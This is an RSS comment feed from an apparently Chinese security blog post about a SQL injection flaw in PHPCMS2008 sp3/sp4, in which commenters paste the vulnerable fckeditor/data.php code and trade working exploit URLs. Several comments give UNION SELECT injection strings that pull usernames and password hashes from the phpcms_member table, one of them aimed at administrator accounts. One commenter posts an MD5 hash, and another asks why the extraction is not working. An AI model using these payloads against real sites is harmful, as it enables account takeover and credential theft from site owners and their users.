<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="Magike 1.2.0 Release" -->
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[PHPCMS2008 sp3、sp4 SQL注入漏洞 & exp]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/</link>
<description>Looking for change</description>
<language>zh-cn-utf8</language>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Magike 1.2.0 Release</generator>
<webMaster>oldjun</webMaster><item>
<title><![CDATA[老显]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-770</link>
<author>><![CDATA[老显]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-770</guid>
<pubDate>Tue, 27 Jul 2010 16:57:01 +0800</pubDate>
<description><![CDATA[都在忙着发布新版本，推出新特性，抢占商机，谁还管这些啊，毕竟都向qian走了]]></description>
<content:encoded><![CDATA[<p>都在忙着发布新版本，推出新特性，抢占商机，谁还管这些啊，毕竟都向qian走了</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[cao2109]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-771</link>
<author>><![CDATA[cao2109]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-771</guid>
<pubDate>Tue, 27 Jul 2010 17:54:20 +0800</pubDate>
<description><![CDATA[恩，最后一句是亮点。
你这是sp3的代码，sp4和这个不一样。
case &#39;get&#39;:
&nbsp;&nbsp; $hour = intval($hour);
&nbsp;&nbsp;
&nbsp;&nbsp; if($hour>1)
&nbsp;&nbsp; {
&nbsp;&nbsp;&nbsp;&nbsp;$hour_start = TIME - $hour*3600;
&nbsp;&nbsp;&nbsp;&nbsp;$hour_end = TIME - ($hour-1)*3600;
&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &quot; AND created_time>=$hour_start AND created_time=$hour_end&quot;;
&nbsp;&nbsp; }
&nbsp;&nbsp; else
&nbsp;&nbsp; {
&nbsp;&nbsp; $where_time = &#39;&#39;;
&nbsp;&nbsp; }
&nbsp;&nbsp; $data = array();
&nbsp;&nbsp; $result = $db->query(&quot;SELECT `created_time`,`id` FROM &quot;.DB_PRE.&quot;editor_data WHERE userid=$_userid AND editorid=&#39;$editorid&#39; $where_time ORDER BY id DESC&quot;);

所以sp4还得有个条件hour0%20union%20select%201,concat(username,0x3a,password)%20from%20phpcms_member/*]]></description>
<content:encoded><![CDATA[<p>恩，最后一句是亮点。<br />你这是sp3的代码，sp4和这个不一样。<br />case &#39;get&#39;:<br />&nbsp;&nbsp; $hour = intval($hour);<br />&nbsp;&nbsp;<br />&nbsp;&nbsp; if($hour>1)<br />&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp;&nbsp;$hour_start = TIME - $hour*3600;<br />&nbsp;&nbsp;&nbsp;&nbsp;$hour_end = TIME - ($hour-1)*3600;<br />&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &quot; AND created_time>=$hour_start AND created_time=$hour_end&quot;;<br />&nbsp;&nbsp; }<br />&nbsp;&nbsp; else<br />&nbsp;&nbsp; {<br />&nbsp;&nbsp; $where_time = &#39;&#39;;<br />&nbsp;&nbsp; }<br />&nbsp;&nbsp; $data = array();<br />&nbsp;&nbsp; $result = $db->query(&quot;SELECT `created_time`,`id` FROM &quot;.DB_PRE.&quot;editor_data WHERE userid=$_userid AND editorid=&#39;$editorid&#39; $where_time ORDER BY id DESC&quot;);</p><p>所以sp4还得有个条件hour0%20union%20select%201,concat(username,0x3a,password)%20from%20phpcms_member/*</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[cao2109]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-772</link>
<author>><![CDATA[cao2109]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-772</guid>
<pubDate>Tue, 27 Jul 2010 17:55:43 +0800</pubDate>
<description><![CDATA[汗 怎么中间还丢代码啊
if($hour>1)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_start = TIME - $hour*3600;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_end = TIME - ($hour-1)*3600;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &quot; AND created_time>=$hour_start AND created_time=$hour_end&quot;;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &#39;&#39;;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data = array();
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$result = $db->query(&quot;SELECT `created_time`,`id` FROM &quot;.DB_PRE.&quot;editor_data WHERE userid=$_userid AND editorid=&#39;$editorid&#39; $where_time ORDER BY id DESC&quot;);]]></description>
<content:encoded><![CDATA[<p>汗 怎么中间还丢代码啊<br />if($hour>1)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_start = TIME - $hour*3600;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_end = TIME - ($hour-1)*3600;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &quot; AND created_time>=$hour_start AND created_time=$hour_end&quot;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &#39;&#39;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data = array();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$result = $db->query(&quot;SELECT `created_time`,`id` FROM &quot;.DB_PRE.&quot;editor_data WHERE userid=$_userid AND editorid=&#39;$editorid&#39; $where_time ORDER BY id DESC&quot;);</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[cao2109]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-773</link>
<author>><![CDATA[cao2109]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-773</guid>
<pubDate>Tue, 27 Jul 2010 17:56:09 +0800</pubDate>
<description><![CDATA[我了个去，中间果然丢了句代码....]]></description>
<content:encoded><![CDATA[<p>我了个去，中间果然丢了句代码....</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[oldjun]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-774</link>
<author>><![CDATA[oldjun]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-774</guid>
<pubDate>Tue, 27 Jul 2010 18:03:25 +0800</pubDate>
<description><![CDATA[最新的sp4版已经修复此问题了~

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($hour>1)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_start = TIME - $hour*3600;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_end = TIME - ($hour-1)*3600;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &quot; AND created_time>=$hour_start AND created_time=$hour_end&quot;;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &#39;&#39;;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}]]></description>
<content:encoded><![CDATA[<p>最新的sp4版已经修复此问题了~</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($hour>1)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_start = TIME - $hour*3600;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hour_end = TIME - ($hour-1)*3600;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &quot; AND created_time>=$hour_start AND created_time=$hour_end&quot;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$where_time = &#39;&#39;;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[雨中风铃]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-775</link>
<author>><![CDATA[雨中风铃]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-775</guid>
<pubDate>Tue, 27 Jul 2010 19:43:33 +0800</pubDate>
<description><![CDATA[为什么不直接登录，然后在地址栏爆出密码：
http://TargerHost/fckeditor/data.php?action=get&where_time=1=2 union all select 1,concat(username,0x7C0D0A,password) from phpcms_member where groupid=1#]]></description>
<content:encoded><![CDATA[<p>为什么不直接登录，然后在地址栏爆出密码：<br />http://TargerHost/fckeditor/data.php?action=get&where_time=1=2 union all select 1,concat(username,0x7C0D0A,password) from phpcms_member where groupid=1#</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[oldjun]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-776</link>
<author>><![CDATA[oldjun]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-776</guid>
<pubDate>Tue, 27 Jul 2010 21:38:42 +0800</pubDate>
<description><![CDATA[一样的。。。]]></description>
<content:encoded><![CDATA[<p>一样的。。。</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[8888]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-777</link>
<author>><![CDATA[8888]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-777</guid>
<pubDate>Thu, 29 Jul 2010 09:00:57 +0800</pubDate>
<description><![CDATA[e367ab21170e6bb21415b5878bddb035

phpcms2008破解出来的MD5密码是破解不出来的，放弃吧]]></description>
<content:encoded><![CDATA[<p>e367ab21170e6bb21415b5878bddb035</p><p>phpcms2008破解出来的MD5密码是破解不出来的，放弃吧</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[俺是农村的]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-778</link>
<author>><![CDATA[俺是农村的]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-778</guid>
<pubDate>Thu, 29 Jul 2010 20:34:47 +0800</pubDate>
<description><![CDATA[最近漏洞很多，涉及各款CMS、BBS、SHOP...请大家及时关注！

呵呵]]></description>
<content:encoded><![CDATA[<p>最近漏洞很多，涉及各款CMS、BBS、SHOP...请大家及时关注！</p><p>呵呵</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[俺是种田的]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-780</link>
<author>><![CDATA[俺是种田的]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-780</guid>
<pubDate>Fri, 30 Jul 2010 07:17:48 +0800</pubDate>
<description><![CDATA[向各位牛人们学习了。。。。]]></description>
<content:encoded><![CDATA[<p>向各位牛人们学习了。。。。</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[狂狼]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-782</link>
<author>><![CDATA[狂狼]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-782</guid>
<pubDate>Sun, 01 Aug 2010 05:21:06 +0800</pubDate>
<description><![CDATA[哈哈，．学习了]]></description>
<content:encoded><![CDATA[<p>哈哈，．学习了</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phpwind 注入以及利用之一：远程代码执行 &laquo;  koohik&#039;s blog]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-1346</link>
<author>><![CDATA[Phpwind 注入以及利用之一：远程代码执行 &laquo;  koohik&#039;s blog]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-1346</guid>
<pubDate>Wed, 13 Oct 2010 04:39:53 +0800</pubDate>
<description><![CDATA[[...][...]]]></description>
<content:encoded><![CDATA[<p>[...][...]</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[跑不出来username password]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/68/#comment-1528</link>
<author>><![CDATA[跑不出来username password]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/68/#comment-1528</guid>
<pubDate>Wed, 06 Apr 2011 21:51:50 +0800</pubDate>
<description><![CDATA[fckeditor/data.php?action=get&where_time=1=2 union all select 1,concat(username,0x7C0D0A,password) from phpcms_member where groupid=1#

不知道为什么跑不出来呢~~]]></description>
<content:encoded><![CDATA[<p>fckeditor/data.php?action=get&where_time=1=2 union all select 1,concat(username,0x7C0D0A,password) from phpcms_member where groupid=1#</p><p>不知道为什么跑不出来呢~~</p>]]></content:encoded>
</item>
</channel>
</rss>
